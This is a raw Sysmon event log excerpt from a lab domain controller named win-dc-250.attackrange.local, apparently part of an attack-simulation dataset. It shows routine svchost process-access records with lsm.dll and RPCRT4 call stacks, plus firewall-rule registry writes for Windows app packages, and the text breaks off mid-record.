13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.357{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{F43F3C7E-067B-4AAE-ABF6-3A133C511E5A}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 13241300x800000000000000010734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.357{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{84386108-5878-4067-9C59-AF1A49CF00CF}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 10341000x800000000000000010733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.342{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.342{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.342{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.342{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.342{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.342{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.326{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531S-1-5-21-2738482597-1131698221-3520544381-500v2.26|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|C=S-1-15-3-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|M=microsoft.windows.secondarytileexperience_cw5n1h2txyewy|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|D=C:\Windows\SystemApps\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\|PFN=Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy| 13241300x800000000000000010726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.326{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{221D6F09-11A9-4AC7-838D-DE0AA2866A1D}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|EmbedCtxt=SecondaryTileExperience| 13241300x800000000000000010725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.326{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{891E4E42-D639-4D15-8AF0-8255E12F32ED}v2.26|Action=Block|Active=TRUE|Dir=In|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|EmbedCtxt=SecondaryTileExperience| 10341000x800000000000000010724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYST